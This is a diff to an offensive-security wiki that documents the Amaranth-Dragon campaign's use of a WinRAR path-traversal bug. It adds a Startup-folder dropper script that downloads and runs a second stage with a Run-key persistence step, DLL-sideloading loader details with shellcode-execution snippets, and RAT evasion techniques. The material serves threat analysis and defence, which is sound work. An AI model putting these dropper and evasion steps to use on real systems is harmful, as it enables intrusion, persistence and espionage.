diff --git a/src/generic-hacking/archive-extraction-path-traversal.md b/src/generic-hacking/archive-extraction-path-traversal.md index f371bcd3c25..beda9fd7e52 100644 --- a/src/generic-hacking/archive-extraction-path-traversal.md +++ b/src/generic-hacking/archive-extraction-path-traversal.md @@ -42,6 +42,14 @@ Options used: Deliver `evil.rar` to the victim and instruct them to extract it with a vulnerable WinRAR build. +### Weaponised Startup persistence (Amaranth-Dragon) + +* Spearphish RAR lures weaponised CVE-2025-8088 to **iterate multiple traversal depths** until the payload lands in the correct Startup folder regardless of where the victim extracts the archive. +* The dropped file is a **`.cmd`/`.bat`** that runs at next logon and typically: + * Downloads a password-protected second-stage RAR from a trusted domain (e.g., Dropbox/actor CDN). + * Extracts a **signed EXE + malicious DLL** pair into `C:\Users\Public\Documents\\`, then sets a **HKCU Run** value and executes the EXE to sideload the DLL. +* Sandboxes that only unpack the outer archive may **miss the Startup-written script entirely**, so archive statics can appear benign while the persistent script is absent from the analysis artifacts. + ### Observed Exploitation in the Wild ESET reported RomCom (Storm-0978/UNC2596) spear-phishing campaigns that attached RAR archives abusing CVE-2025-8088 to deploy customised backdoors and facilitate ransomware operations. @@ -97,5 +105,6 @@ ESET reported RomCom (Storm-0978/UNC2596) spear-phishing campaigns that attached - [Trend Micro ZDI-25-949 – 7-Zip symlink ZIP traversal (CVE-2025-11001)](https://www.zerodayinitiative.com/advisories/ZDI-25-949/) - [JFrog Research – mholt/archiver Zip-Slip (CVE-2025-3445)](https://research.jfrog.com/vulnerabilities/archiver-zip-slip/) +- [Check Point Research – Amaranth-Dragon weaponises CVE-2025-8088 for targeted espionage](https://research.checkpoint.com/2026/amaranth-dragon-weaponizes-cve-2025-8088-for-targeted-espionage/) {{#include ../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md index 27bbfb3071a..27d8d20981c 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md +++ b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md @@ -491,6 +491,28 @@ Tradecraft notes: * Because the executable stays trusted, most allowlisting controls only need your malicious DLL to sit alongside it. Focus on customizing the loader DLL; the signed parent can typically run untouched. * ShadowPad’s decryptor expects the TMP blob to live next to the loader and be writable so it can zero the file after mapping. Keep the directory writable until the payload loads; once in memory the TMP file can safely be deleted for OPSEC. +## Amaranth Loader / TGAmaranth sideloading pattern + +* Delivery: password-protected RAR/ZIP drops a **signed EXE + malicious DLL** together; the EXE looks for a dependency name (`DllSafeCheck64.dll`, `libcef.dll`, etc.) and executes attacker code from the same folder. +* Exports: only **one export contains logic**; all other exports point to a stub that immediately `Sleep(INFINITE)` to confuse static/automated triage. +* Decryption chain: strings/URLs are XOR-decoded at runtime, then the loader fetches an **AES key from a first URL (Pastebin or actor infra, often geo-fenced)** and an **encrypted payload from a second URL**, decrypts with **AES-CBC** using a constant IV `12 34 56 78 90 AB CD EF 34 56 78 90 AB CD EF 12`, allocates `PAGE_EXECUTE_READWRITE`, and runs the shellcode (commonly Havoc). +* Variants swap Pastebin for Cloudflare-fronted hosts that reply `403` to non-target IPs, and rotate benign-looking **User-Agents** when calling `InternetOpenA`. +* A later variant decrypts a local shellcode blob with a **non-standard RC4 PRGA** (output byte = `(s[i]+s[j])&0xff` instead of `box[box[i]+box[j]]`), then executes inside a **fiber context** to alter the call stack: + ```python + def prga(box): + j=0 + for i in range(len(data)): + ii=(i+1)&0xff; j=(j+box[ii])&0xff + box[ii], box[j] = box[j], box[ii] + yield (box[ii]+box[j]) & 0xff + ``` + ```c + ConvertThreadToFiber(NULL); + LPVOID f = CreateFiber(0, shellcode, NULL); + SwitchToFiber(f); + ``` +* The TGAmaranth RAT (sideloaded by the same pattern) decrypts a Telegram bot token with the XOR routine, performs **self-debugging via `DebugActiveProcess`** to detect analysts, and **unhooks `ntdll.dll`** by copying a clean `.text` section from a suspended `cmd.exe` into its own process before running commands. + ## References - [CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe](https://trustedsec.com/blog/cve-2025-1729-privilege-escalation-using-tpqmassistant-exe) @@ -503,6 +525,7 @@ Tradecraft notes: - [Sysinternals Process Monitor](https://learn.microsoft.com/sysinternals/downloads/procmon) - [Unit 42 – Digital Doppelgangers: Anatomy of Evolving Impersonation Campaigns Distributing Gh0st RAT](https://unit42.paloaltonetworks.com/impersonation-campaigns-deliver-gh0st-rat/) - [Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation](https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/) +- [Check Point Research – Amaranth-Dragon weaponises CVE-2025-8088 for targeted espionage](https://research.checkpoint.com/2026/amaranth-dragon-weaponizes-cve-2025-8088-for-targeted-espionage/) -{{#include ../../../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md index 4d769d374e9..55cfd717f5f 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md +++ b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md @@ -48,6 +48,20 @@ Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup" ../../generic-hacking/archive-extraction-path-traversal.md {{#endref}} +### Startup dropper chain example (CVE-2025-8088) + +A practical abuse seen in 2025 campaigns: + +```cmd +# dropped .cmd inside Startup via path traversal +powershell -w hidden (New-Object Net.WebClient).DownloadFile(`RAR_URL`, %TEMP%\u.rar) +rar.exe x -hp`pass` %TEMP%\u.rar C:\Users\Public\Documents\Microsoft\winupdate_v%RANDOM%%TIME:~3,2%\ +reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v `rand` /d `exe_path` +start "" `exe_path` # signed host sideloads malicious DLL +``` + +Even if the victim only unpacks the archive, the auto-started script will fetch the second stage on reboot/logon, install a Run key, and execute the signed binary that sideloads the attacker DLL. + ## Registry @@ -346,6 +360,7 @@ autorunsc.exe -m -nobanner -a * -ct /accepteula - [https://attack.mitre.org/techniques/T1547/001/](https://attack.mitre.org/techniques/T1547/001/) - [https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2](https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2) - [https://www.itprotoday.com/cloud-computing/how-can-i-add-boot-option-starts-alternate-shell](https://www.itprotoday.com/cloud-computing/how-can-i-add-boot-option-starts-alternate-shell) +- [Check Point Research – Amaranth-Dragon weaponises CVE-2025-8088 for targeted espionage](https://research.checkpoint.com/2026/amaranth-dragon-weaponizes-cve-2025-8088-for-targeted-espionage/)